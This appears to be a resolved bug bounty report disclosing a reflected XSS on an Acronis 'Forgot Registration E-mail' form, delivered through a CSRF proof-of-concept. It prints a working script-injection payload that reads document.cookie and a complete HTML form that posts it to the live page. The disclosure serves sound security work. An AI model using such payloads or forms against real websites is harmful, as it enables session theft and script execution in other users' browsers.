CSRF and XSS on www.acronis.com
Low
A
Acronis
Submitted None
Actions:
Reported by
cabelo
Vulnerability Details
Technical details and impact analysis
Hi team,
I've discovered a XSS Reflected vulnerability on Forgot Registration E-mail form. I performed a POC using CSRF to inject and execute a javascript code in the POST request.
Target Page: https://www.acronis.com/en-us/my/remind/index.html
POST blocked: token=a016902ceaeb6ae91c21302631fbbcfc&SN=818198181891891981981981516518198198&OrderId=&Submit=Send+E-mail%0D%0A
Payload: 1"<!--><Svg OnLoad=(confirm)(document.cookie)<!--
Steps to reproduce/POC:
CSRF html page:
{F954073}
CORS html code:
{F954074}
code:
```
<form action=https://www.acronis.com/en-us/my/remind/index.html method=POST><input type=hidden name="token" value="a016902ceaeb6ae91c21302631fbbcfc"><input type=hidden name="SN" value="818198181891891981981981516518198198"><input type=hidden name="OrderId" value=""><input type=hidden name="Submit" value="Send+E-mail%0D%0A"><input type=hidden name="c" value="1"<!--><Svg OnLoad=(confirm)(document.cookie)<!--"><input type=submit value=XSS-Acronis></form>
```
XSS:
{F954075}
Best Regards.
## Impact
An attacker execute arbitrary JavaScript code in the context of the users website.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected